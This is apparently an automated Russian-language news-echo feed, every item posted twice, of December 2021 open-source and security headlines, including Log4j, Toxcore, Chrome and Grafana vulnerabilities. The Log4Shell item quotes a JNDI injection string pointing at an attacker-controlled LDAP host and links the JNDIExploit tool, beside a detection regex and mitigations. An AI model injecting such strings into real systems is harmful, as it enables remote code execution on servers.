# Переполнение буфера в Toxcore, эксплуатируемое через отправку UDP-пакета
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-15
В Toxcore, эталонной реализации P2P-протокола обмена сообщениями Tox, выявлена уязвимость (CVE-2021-44847), которая потенциально позволяет инициировать выполнение кода при обработке специально оформленного UDP-пакета. Уязвимости подвержены все пользователи приложений на базе Toxcore, в которых не отключён транспорт UDP. Для атаки достаточно отправить UDP-пакет, зная IP-адрес, сетевой порт и открытый DHT-ключ жертвы (данные сведения доступны публично в DHT, т.е. атака могла быть совершена на любого пользователя или узел DHT).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56354
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-15
В Toxcore, эталонной реализации P2P-протокола обмена сообщениями Tox, выявлена уязвимость (CVE-2021-44847), которая потенциально позволяет инициировать выполнение кода при обработке специально оформленного UDP-пакета. Уязвимости подвержены все пользователи приложений на базе Toxcore, в которых не отключён транспорт UDP. Для атаки достаточно отправить UDP-пакет, зная IP-адрес, сетевой порт и открытый DHT-ключ жертвы (данные сведения доступны публично в DHT, т.е. атака могла быть совершена на любого пользователя или узел DHT).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56354
# Выпуск дистрибутива Pop!_OS 21.10, развивающего рабочий стол COSMIC
Новостной_робот (mira, 1) → All – 16:00:03 2021-12-15
Компания System76, специализирующаяся на производстве ноутбуков, ПК и серверов, поставляемых с Linux, опубликовала выпуск дистрибутива Pop!_OS 21.10. Pop!_OS основан на пакетной базе Ubuntu 21.10 и поставляется с собственным окружением рабочего стола COSMIC. Наработки проекта распространяются под лицензией GPLv3. ISO-образы сформированы для архитектуры x86_64 и ARM64 в вариантах для графических чипов NVIDIA (2.9 ГБ) и Intel/AMD (2.5 ГБ), а также для плат.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56350
Новостной_робот (mira, 1) → All – 16:00:03 2021-12-15
Компания System76, специализирующаяся на производстве ноутбуков, ПК и серверов, поставляемых с Linux, опубликовала выпуск дистрибутива Pop!_OS 21.10. Pop!_OS основан на пакетной базе Ubuntu 21.10 и поставляется с собственным окружением рабочего стола COSMIC. Наработки проекта распространяются под лицензией GPLv3. ISO-образы сформированы для архитектуры x86_64 и ARM64 в вариантах для графических чипов NVIDIA (2.9 ГБ) и Intel/AMD (2.5 ГБ), а также для плат.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56350
# Выпуск эмулятора QEMU 6.2
Новостной_робот (mira, 1) → All – 16:00:03 2021-12-15
Представлен релиз проекта QEMU 6.2. В качестве эмулятора QEMU позволяет запустить программу, собранную для одной аппаратной платформы, на системе с совершенно иной архитектурой, например, выполнить приложение для ARM на x86-совместимом ПК. В режиме виртуализации в QEMU производительность выполнения кода в изолированном окружении близка к аппаратной системе за счёт прямого выполнения инструкций на CPU и задействования гипервизора Xen или модуля KVM.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56349
Новостной_робот (mira, 1) → All – 16:00:03 2021-12-15
Представлен релиз проекта QEMU 6.2. В качестве эмулятора QEMU позволяет запустить программу, собранную для одной аппаратной платформы, на системе с совершенно иной архитектурой, например, выполнить приложение для ARM на x86-совместимом ПК. В режиме виртуализации в QEMU производительность выполнения кода в изолированном окружении близка к аппаратной системе за счёт прямого выполнения инструкций на CPU и задействования гипервизора Xen или модуля KVM.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56349
# Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту
Новостной_робот (mira, 1) → All – 16:00:03 2021-12-15
В реализации подстановок JNDI в библиотеке Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45046), проявляющаяся несмотря на добавленные в выпуск 2.15 исправления и независимо от использования настройки "log4j2.noFormatMsgLookup" для защиты. Проблема представляет опасность в основном для старых версий Log4j 2, защищённых при помощи флага "noFormatMsgLookup", так как даёт возможность обойти защиту от прошлой узявимости (Log4Shell, CVE-2021-44228), позволяющей выполнить свой код на сервере. Для пользователей версии 2.15 эксплуатация ограничивается созданием условий для аварийного завершения приложения из-за исчерпания доступных ресурсов.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56347
Новостной_робот (mira, 1) → All – 16:00:03 2021-12-15
В реализации подстановок JNDI в библиотеке Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45046), проявляющаяся несмотря на добавленные в выпуск 2.15 исправления и независимо от использования настройки "log4j2.noFormatMsgLookup" для защиты. Проблема представляет опасность в основном для старых версий Log4j 2, защищённых при помощи флага "noFormatMsgLookup", так как даёт возможность обойти защиту от прошлой узявимости (Log4Shell, CVE-2021-44228), позволяющей выполнить свой код на сервере. Для пользователей версии 2.15 эксплуатация ограничивается созданием условий для аварийного завершения приложения из-за исчерпания доступных ресурсов.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56347
# Выпуск децентрализованной видеовещательной платформы PeerTube 4.0
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-14
Состоялся выпуск децентрализованной платформы для организации видеохостинга и видеовещания PeerTube 4.0. PeerTube предлагает независимую от отдельных поставщиков альтернативу YouTube, Dailymotion и Vimeo, использующую сеть распространения контента на базе P2P-коммуникаций и связывания между собой браузеров посетителей. Наработки проекта распространяются под лицензией AGPLv3.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56338
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-14
Состоялся выпуск децентрализованной платформы для организации видеохостинга и видеовещания PeerTube 4.0. PeerTube предлагает независимую от отдельных поставщиков альтернативу YouTube, Dailymotion и Vimeo, использующую сеть распространения контента на базе P2P-коммуникаций и связывания между собой браузеров посетителей. Наработки проекта распространяются под лицензией AGPLv3.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56338
# Уязвимости в X.Org Server
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
В X.Org Server выявлены четыре уязвимости, позволяющие поднять свои привилегии в системе, если X-сервер выполняется с правами root, или выполнить код на удалённой системе, если для доступа используется перенаправление сеанса X11 при помощи SSH. Проблемы обещают устранить в выпуске xorg-server 21.1.2, который ожидается в ближайшие дни. В дистрибутивах проблемы пока остаются неисправленными (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56344
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
В X.Org Server выявлены четыре уязвимости, позволяющие поднять свои привилегии в системе, если X-сервер выполняется с правами root, или выполнить код на удалённой системе, если для доступа используется перенаправление сеанса X11 при помощи SSH. Проблемы обещают устранить в выпуске xorg-server 21.1.2, который ожидается в ближайшие дни. В дистрибутивах проблемы пока остаются неисправленными (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56344
# ЯОС - прототип безопасной русскоязычной операционной системы на базе проекта A2
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
Проект ЯОС развивает ответвление от операционной системы A2, также известной как Bluebottle и Active Oberon. Одна из основных целей проекта - кардинальное внедрение русского языка во всю систему, включая (хотя бы частичный) перевод исходных текстов на русский язык. ЯОС может работать как приложение в окне под Linux или Windows, а также в виде обособленной операционной системы на оборудовании x86 и ARM (поддерживаются платы Zybo Z7-10 и Raspberry Pi 2). Код написан на языке Active Oberon и распространяется под лицензией BSD.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56339
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
Проект ЯОС развивает ответвление от операционной системы A2, также известной как Bluebottle и Active Oberon. Одна из основных целей проекта - кардинальное внедрение русского языка во всю систему, включая (хотя бы частичный) перевод исходных текстов на русский язык. ЯОС может работать как приложение в окне под Linux или Windows, а также в виде обособленной операционной системы на оборудовании x86 и ARM (поддерживаются платы Zybo Z7-10 и Raspberry Pi 2). Код написан на языке Active Oberon и распространяется под лицензией BSD.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56339
# 17 проектов Apache оказались затронуты уязвимостью в Log4j 2
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
Организация Apache Software Foundation опубликовала сводный отчёт о проектах, которые затрагивает критическая уязвимость в Log4j 2, позволяющая выполнить произвольный код на сервере. Проблеме подвержены следующие проекты Apache: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl и Calcite Avatica. Уязвимость также затронула продукты GitHub, включая GitHub.com, GitHub Enterprise Cloud и GitHub Enterprise Server.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56342
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
Организация Apache Software Foundation опубликовала сводный отчёт о проектах, которые затрагивает критическая уязвимость в Log4j 2, позволяющая выполнить произвольный код на сервере. Проблеме подвержены следующие проекты Apache: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl и Calcite Avatica. Уязвимость также затронула продукты GitHub, включая GitHub.com, GitHub Enterprise Cloud и GitHub Enterprise Server.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56342
# Coinbase опубликовал библиотеку распределённых криптоалгоритмов Kryptology
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
Компания Coinbase, поддерживающая одноимённую платформу обмена цифровых валют, объявила об открытии исходных текстов криптографической библиотеки Kryptology, предлагающей набор криптографических алгоритмов для применения в распределённых системах, в которых шифрование и подтверждение подлинности осуществляется с привлечением нескольких участников. Код написан на языке Go и распространяется под лицензией Apache 2.0.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56341
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
Компания Coinbase, поддерживающая одноимённую платформу обмена цифровых валют, объявила об открытии исходных текстов криптографической библиотеки Kryptology, предлагающей набор криптографических алгоритмов для применения в распределённых системах, в которых шифрование и подтверждение подлинности осуществляется с привлечением нескольких участников. Код написан на языке Go и распространяется под лицензией Apache 2.0.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56341
# Обновление Chrome 96.0.4664.110 с устранением критической и 0-day уязвимостей
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
Компания Google сформировала обновление Chrome 96.0.4664.110, в котором исправлены 5 уязвимостей, в том числе уязвимость (CVE-2021-4102), уже применяемая злоумышленниками в эксплоитах (0-day) и критическая уязвимость (CVE-2021-4098), позволяющая обойти все уровни защиты браузера и выполнить код в системе за пределами sandbox-окружения.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56340
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-14
Компания Google сформировала обновление Chrome 96.0.4664.110, в котором исправлены 5 уязвимостей, в том числе уязвимость (CVE-2021-4102), уже применяемая злоумышленниками в эксплоитах (0-day) и критическая уязвимость (CVE-2021-4098), позволяющая обойти все уровни защиты браузера и выполнить код в системе за пределами sandbox-окружения.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56340
# Доступны язык программирования Dart 2.15 и фреймворк Flutter 2.8
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-13
Компания Google опубликовала релиз языка программирования Dart 2.15, продолживший развитие кардинально переработанной ветки Dart 2, которая отличается от изначального варианта языка Dart применением сильной статической типизации (типы могут выводиться автоматически, поэтому указание типов не является обязательным, но динамическая типизация больше не используется и вычисленный изначально тип закрепляется за переменной и в дальнейшем применяется строгая проверка типа).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56336
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-13
Компания Google опубликовала релиз языка программирования Dart 2.15, продолживший развитие кардинально переработанной ветки Dart 2, которая отличается от изначального варианта языка Dart применением сильной статической типизации (типы могут выводиться автоматически, поэтому указание типов не является обязательным, но динамическая типизация больше не используется и вычисленный изначально тип закрепляется за переменной и в дальнейшем применяется строгая проверка типа).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56336
# В каталоге Python-пакетов PyPI выявлены три вредоносные библиотеки
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-13
В каталоге PyPI (Python Package Index) выявлены три библиотеки, содержащие вредоносный код. До выявления проблем и удаления из каталога в сумме пакеты успели загрузить почти 15 тысяч раз.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56337
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-13
В каталоге PyPI (Python Package Index) выявлены три библиотеки, содержащие вредоносный код. До выявления проблем и удаления из каталога в сумме пакеты успели загрузить почти 15 тысяч раз.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56337
# Компания Intel перевела разработку Cloud Hypervisor в организацию Linux Foundation
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-13
Компания Intel передала гипервизор Cloud Hypervisor, оптимизированный для применения в облачных системах, под покровительство организации Linux Foundation, инфраструктура и сервисы которой будут использованы в дальнейшей разработке. Переход под крыло Linux Foundation избавит проект от зависимости от отдельной коммерческой компании и упростит совместную работу с привлечением сторонних участников. О своей поддержке проекта уже объявили такие компании, как Alibaba, ARM, ByteDance и Microsoft, представители которых, наряду с разработчиками из Intel, образовали курирующий проект совет.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56335
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-13
Компания Intel передала гипервизор Cloud Hypervisor, оптимизированный для применения в облачных системах, под покровительство организации Linux Foundation, инфраструктура и сервисы которой будут использованы в дальнейшей разработке. Переход под крыло Linux Foundation избавит проект от зависимости от отдельной коммерческой компании и упростит совместную работу с привлечением сторонних участников. О своей поддержке проекта уже объявили такие компании, как Alibaba, ARM, ByteDance и Microsoft, представители которых, наряду с разработчиками из Intel, образовали курирующий проект совет.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56335
# Выпуск операционной системы ToaruOS 2.0
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-12
Опубликован выпуск Unix-подобной операционной системы ToaruOS 2.0, написанной с нуля и поставляемой со своим ядром, загрузчиком, стандартной Си-библиотекой, пакетным менеджером, компонентами пространства пользователя и графическим интерфейсом с композитным оконным менеджером. Код проекта написан на языке Си и распространяется под лицензией BSD. Для загрузки подготовлен live-образ, размером 14.4 МБ, который можно протестировать в QEMU, VMware или VirtualBox.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56333
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-12
Опубликован выпуск Unix-подобной операционной системы ToaruOS 2.0, написанной с нуля и поставляемой со своим ядром, загрузчиком, стандартной Си-библиотекой, пакетным менеджером, компонентами пространства пользователя и графическим интерфейсом с композитным оконным менеджером. Код проекта написан на языке Си и распространяется под лицензией BSD. Для загрузки подготовлен live-образ, размером 14.4 МБ, который можно протестировать в QEMU, VMware или VirtualBox.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56333
# Зимнее обновление стартовых наборов ALT p10
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-12
Опубликован третий выпуск стартовых наборов на Десятой платформе ALT. Преложенные образы подходят для начала работы со стабильным репозиторием тем опытным пользователям, которые предпочитают самостоятельно определять список пакетов приложений и настраивать систему (вплоть до создания собственных производных). Как составные произведения они распространяются на условиях лицензии GPLv2+. Варианты включают в себя базовую систему и одно из окружений рабочего стола или набор специализированных приложений.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56334
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-12
Опубликован третий выпуск стартовых наборов на Десятой платформе ALT. Преложенные образы подходят для начала работы со стабильным репозиторием тем опытным пользователям, которые предпочитают самостоятельно определять список пакетов приложений и настраивать систему (вплоть до создания собственных производных). Как составные произведения они распространяются на условиях лицензии GPLv2+. Варианты включают в себя базовую систему и одно из окружений рабочего стола или набор специализированных приложений.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56334
# Выпуск системы совместной разработки GitBucket 4.37
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-12
Представлен выпуск проекта GitBucket 4.37, развивающего систему для совместной работы с Git-репозиториями с интерфейсом в стиле GitHub и Bitbucket. Система отличается простотой установки, возможностью расширения функциональности через плагины и совместимостью с API GitHub. Код написан на языке Scala и доступен под лицензией Apache 2.0. В качестве СУБД могут использоваться MySQL и PostgreSQL.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56332
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-12
Представлен выпуск проекта GitBucket 4.37, развивающего систему для совместной работы с Git-репозиториями с интерфейсом в стиле GitHub и Bitbucket. Система отличается простотой установки, возможностью расширения функциональности через плагины и совместимостью с API GitHub. Код написан на языке Scala и доступен под лицензией Apache 2.0. В качестве СУБД могут использоваться MySQL и PostgreSQL.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56332
# Выпуск KDE Gear 21.12, набора приложений от проекта KDE
Новостной_робот (mira, 1) → All – 21:00:01 2021-12-11
Представлено декабрьское сводное обновление приложений (21.12), развиваемых проектом KDE. Напомним, что сводный набор приложений KDE c апреля публикуется под именем KDE Gear, вместо KDE Apps и KDE Applications. Всего в рамках обновления опубликованы выпуски 230 программ, библиотек и плагинов. Информацию о наличии Live-сборок с новыми выпусками приложений можно получить на данной странице.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56330
Новостной_робот (mira, 1) → All – 21:00:01 2021-12-11
Представлено декабрьское сводное обновление приложений (21.12), развиваемых проектом KDE. Напомним, что сводный набор приложений KDE c апреля публикуется под именем KDE Gear, вместо KDE Apps и KDE Applications. Всего в рамках обновления опубликованы выпуски 230 программ, библиотек и плагинов. Информацию о наличии Live-сборок с новыми выпусками приложений можно получить на данной странице.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56330
# Выпуск Ventoy 1.0.62, инструментария для загрузки произвольных систем с USB-носителей
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-11
Опубликован выпуск инструментария Ventoy 1.0.62, предназначенного для создания загрузочных USB-носителей, включающих несколько операционных систем. Программа примечательна тем, что обеспечивает возможность загрузки ОС из неизменных ISO, WIM, IMG, VHD и EFI-образов, не требуя распаковки образа или переформатирования носителя. Например, достаточно просто скопировать на USB Flash с загрузчиком Ventoy интересующий набор iso-образов и Ventoy обеспечит возможность загрузки находящихся внутри операционных систем. В любой момент можно заменить или добавить новые iso-образы просто скопировав новые файлы, что удобно для тестирования и предварительного ознакомления с различными дистрибутивами и операционными системами. Код проекта написан на языке Си и распространяется под лицензией GPLv3.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56328
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-11
Опубликован выпуск инструментария Ventoy 1.0.62, предназначенного для создания загрузочных USB-носителей, включающих несколько операционных систем. Программа примечательна тем, что обеспечивает возможность загрузки ОС из неизменных ISO, WIM, IMG, VHD и EFI-образов, не требуя распаковки образа или переформатирования носителя. Например, достаточно просто скопировать на USB Flash с загрузчиком Ventoy интересующий набор iso-образов и Ventoy обеспечит возможность загрузки находящихся внутри операционных систем. В любой момент можно заменить или добавить новые iso-образы просто скопировав новые файлы, что удобно для тестирования и предварительного ознакомления с различными дистрибутивами и операционными системами. Код проекта написан на языке Си и распространяется под лицензией GPLv3.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56328
# Kali Linux 2021.4
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-11
Состоялся релиз Kali Linux 2021.4 (последний выпуск в 2021 году) — дистрибутива для [ оценки безопасности компьютерных систем или сетей средствами моделирования атаки злоумышленника ]( https://ru.wikipedia.org/wiki/Испытание_на_проникновение ) (penetration testing). Kali Linux предназначен для профессионалов и не рекомендуется к использованию в качестве ОС общего назначения! ( [ читать дальше... ]( https://www.linux.org.ru/news/linux-general/16685249#cut ) )
Ссылка: https://www.linux.org.ru/news/linux-general/16685249
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-11
Состоялся релиз Kali Linux 2021.4 (последний выпуск в 2021 году) — дистрибутива для [ оценки безопасности компьютерных систем или сетей средствами моделирования атаки злоумышленника ]( https://ru.wikipedia.org/wiki/Испытание_на_проникновение ) (penetration testing). Kali Linux предназначен для профессионалов и не рекомендуется к использованию в качестве ОС общего назначения! ( [ читать дальше... ]( https://www.linux.org.ru/news/linux-general/16685249#cut ) )
Ссылка: https://www.linux.org.ru/news/linux-general/16685249
# Кандидат в релизы Wine 7.0
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-11
Началось тестирование первого кандидата в релизы Wine 7.0, открытой реализации WinAPI. Кодовая база переведена на стадию заморозки перед релизом, который ожидается в середине января. По сравнению с выпуском Wine 6.23 закрыто 32 отчёта об ошибках и внесено 211 изменений.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56327
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-11
Началось тестирование первого кандидата в релизы Wine 7.0, открытой реализации WinAPI. Кодовая база переведена на стадию заморозки перед релизом, который ожидается в середине января. По сравнению с выпуском Wine 6.23 закрыто 32 отчёта об ошибках и внесено 211 изменений.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56327
# Уязвимости в Grafana, позволяющие получить доступ к файлам в системе
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-11
В открытой платформе визуализации данных Grafana выявлена уязвимость (CVE-2021-43798), позволяющая выйти за пределы базового каталога и получить доступ к произвольным файлам в локальной файловой системе сервера, насколько это позволяют права доступа пользователя, под которым выполняется Grafana. Проблема вызвана некорректной работой обработчика пути "/public/plugins/‹plugin-id›/", в котором допускалось использование символов ".." для доступа к нижележащим каталогам.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56329
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-11
В открытой платформе визуализации данных Grafana выявлена уязвимость (CVE-2021-43798), позволяющая выйти за пределы базового каталога и получить доступ к произвольным файлам в локальной файловой системе сервера, насколько это позволяют права доступа пользователя, под которым выполняется Grafana. Проблема вызвана некорректной работой обработчика пути "/public/plugins/‹plugin-id›/", в котором допускалось использование символов ".." для доступа к нижележащим каталогам.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56329
# Критическая уязвимость в Log4j позволяет выполнять произвольный код на сервере
Новостной_робот (mira, 1) → All – 02:00:01 2021-12-11
Опубликована критическая уязвимость CVE-2021-44228 в библиотеке Log4j языка Java. Библиотека разрабатывается с 2001 года в Арасhe Software Foundation и представляет собой фреймворк ведения логов. Уязвимость является крайне опасной ввиду следующих причин: Чрезвычайно широкое распростронение библиотеки в экосистеме Java Крайне простой эксплойт Возможность выполнения злоумышленником произвольной команды на сервере Возможность написания злоумышленником автоматических сканеров уязвимости в доступных из Интернет сервисах (тактика «spray and pray») Уязвимость работает путем передачи для записи в лог строки вида "${jndi:ldap://hackerownserver.com/resource}", при этом злоумышленник держит на hackerownserver.com сервер LDAP, специально настроенный для проведения атак вида «JNDI Injection», например JNDIExploit. Помимо схемы jndi:ldap: возможно использование jndi:rmi: и jndi:dns: Как бороться Уязвимыми следует считать Log4j версии 2.x. Версии 1.x уязвимы только при явном использовании JMSAppender. Проверить журнал приложения на предмет предпринятых атак можно при помощи egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' Для устранения уязвимости необходимо как можно скорее обновить Log4j до версии 2.15.0. Кроме того, если обновление невозможно в силу тех или иных причин, то обезопасить приложение можно путем установки системной переменной Java log4j2.formatMsgNoLookups в значение true (для Log4j 2.10+), или путем удаления класса JndiLookup из classpath. Ссылки Официальная страница Log4j: [ https://logging.apache.org/log4j/2.x/ ]( https://logging.apache.org/log4j/2.x/ ) Log4j RCE Exploitation Detection: [ https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ]( https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ) JNDIExploit: [ https://github.com/feihong-cs/JNDIExploit ]( https://github.com/feihong-cs/JNDIExploit ) Как работает JNDI Injection: [ https://www.veracode.com/blog/research/exploiting-jndi-injections-java ]( https://www.veracode.com/blog/research/exploiting-jndi-injections-java )
Ссылка: https://www.linux.org.ru/news/security/16685022
Новостной_робот (mira, 1) → All – 02:00:01 2021-12-11
Опубликована критическая уязвимость CVE-2021-44228 в библиотеке Log4j языка Java. Библиотека разрабатывается с 2001 года в Арасhe Software Foundation и представляет собой фреймворк ведения логов. Уязвимость является крайне опасной ввиду следующих причин: Чрезвычайно широкое распростронение библиотеки в экосистеме Java Крайне простой эксплойт Возможность выполнения злоумышленником произвольной команды на сервере Возможность написания злоумышленником автоматических сканеров уязвимости в доступных из Интернет сервисах (тактика «spray and pray») Уязвимость работает путем передачи для записи в лог строки вида "${jndi:ldap://hackerownserver.com/resource}", при этом злоумышленник держит на hackerownserver.com сервер LDAP, специально настроенный для проведения атак вида «JNDI Injection», например JNDIExploit. Помимо схемы jndi:ldap: возможно использование jndi:rmi: и jndi:dns: Как бороться Уязвимыми следует считать Log4j версии 2.x. Версии 1.x уязвимы только при явном использовании JMSAppender. Проверить журнал приложения на предмет предпринятых атак можно при помощи egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' Для устранения уязвимости необходимо как можно скорее обновить Log4j до версии 2.15.0. Кроме того, если обновление невозможно в силу тех или иных причин, то обезопасить приложение можно путем установки системной переменной Java log4j2.formatMsgNoLookups в значение true (для Log4j 2.10+), или путем удаления класса JndiLookup из classpath. Ссылки Официальная страница Log4j: [ https://logging.apache.org/log4j/2.x/ ]( https://logging.apache.org/log4j/2.x/ ) Log4j RCE Exploitation Detection: [ https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ]( https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ) JNDIExploit: [ https://github.com/feihong-cs/JNDIExploit ]( https://github.com/feihong-cs/JNDIExploit ) Как работает JNDI Injection: [ https://www.veracode.com/blog/research/exploiting-jndi-injections-java ]( https://www.veracode.com/blog/research/exploiting-jndi-injections-java )
Ссылка: https://www.linux.org.ru/news/security/16685022
# Еврокомиссия будет распространять свои программы под открытыми лицензиями
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-10
Европейская комиссия утвердила новые правила в отношении открытого программного обеспечения, в соответствии с которыми разработанные по заказу Еврокомиссии программные решения, представляющие потенциальную пользу для жителей, компаний и государственных учреждений, будут доступны всем желающим под открытыми лицензиями. Правила также упрощают перевод в разряд открытых уже существующих программных продуктов, принадлежащих Еврокомиссии, и уменьшают связанную с данным процессом бумажную волокиту.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56325
Новостной_робот (mira, 1) → All – 21:00:02 2021-12-10
Европейская комиссия утвердила новые правила в отношении открытого программного обеспечения, в соответствии с которыми разработанные по заказу Еврокомиссии программные решения, представляющие потенциальную пользу для жителей, компаний и государственных учреждений, будут доступны всем желающим под открытыми лицензиями. Правила также упрощают перевод в разряд открытых уже существующих программных продуктов, принадлежащих Еврокомиссии, и уменьшают связанную с данным процессом бумажную волокиту.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56325
# Выпуск дистрибутива для исследования безопасности Kali Linux 2021.4
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-10
Увидел свет релиз дистрибутива Kali Linux 2021.4, предназначенного для тестирования систем на предмет наличия уязвимостей, проведения аудита, анализа остаточной информации и выявления последствий атак злоумышленников. Все оригинальные наработки, созданные в рамках дистрибутива, распространяются под лицензией GPL и доступны через публичный Git-репозиторий. Для загрузки подготовлены несколько вариантов iso-образов, размером 466 МБ, 3.1 ГБ и 3.7 ГБ. Сборки доступны для архитектур i386, x86_64, ARM (armhf и armel, Raspberry Pi, Banana Pi, ARM Chromebook, Odroid). По умолчанию предлагается рабочий стол Xfce, но опционально поддерживаются KDE, GNOME, MATE, LXDE и Enlightenment e17.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56324
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-10
Увидел свет релиз дистрибутива Kali Linux 2021.4, предназначенного для тестирования систем на предмет наличия уязвимостей, проведения аудита, анализа остаточной информации и выявления последствий атак злоумышленников. Все оригинальные наработки, созданные в рамках дистрибутива, распространяются под лицензией GPL и доступны через публичный Git-репозиторий. Для загрузки подготовлены несколько вариантов iso-образов, размером 466 МБ, 3.1 ГБ и 3.7 ГБ. Сборки доступны для архитектур i386, x86_64, ARM (armhf и armel, Raspberry Pi, Banana Pi, ARM Chromebook, Odroid). По умолчанию предлагается рабочий стол Xfce, но опционально поддерживаются KDE, GNOME, MATE, LXDE и Enlightenment e17.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56324
# Доступен Wayland 1.20
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-10
Состоялся стабильный релиз протокола, механизма межпроцессного взаимодействия и библиотек Wayland 1.20. Ветка 1.20 обратно совместима на уровне API и ABI с выпусками 1.x и содержит в основном исправления ошибок и незначительные обновления протокола. Композитный сервер Weston, предоставляющий код и рабочие примеры для использования Wayland в десктоп-окружениях и встраиваемых решениях, развивается в рамках отдельного цикла разработки.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56320
Новостной_робот (mira, 1) → All – 16:00:02 2021-12-10
Состоялся стабильный релиз протокола, механизма межпроцессного взаимодействия и библиотек Wayland 1.20. Ветка 1.20 обратно совместима на уровне API и ABI с выпусками 1.x и содержит в основном исправления ошибок и незначительные обновления протокола. Композитный сервер Weston, предоставляющий код и рабочие примеры для использования Wayland в десктоп-окружениях и встраиваемых решениях, развивается в рамках отдельного цикла разработки.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56320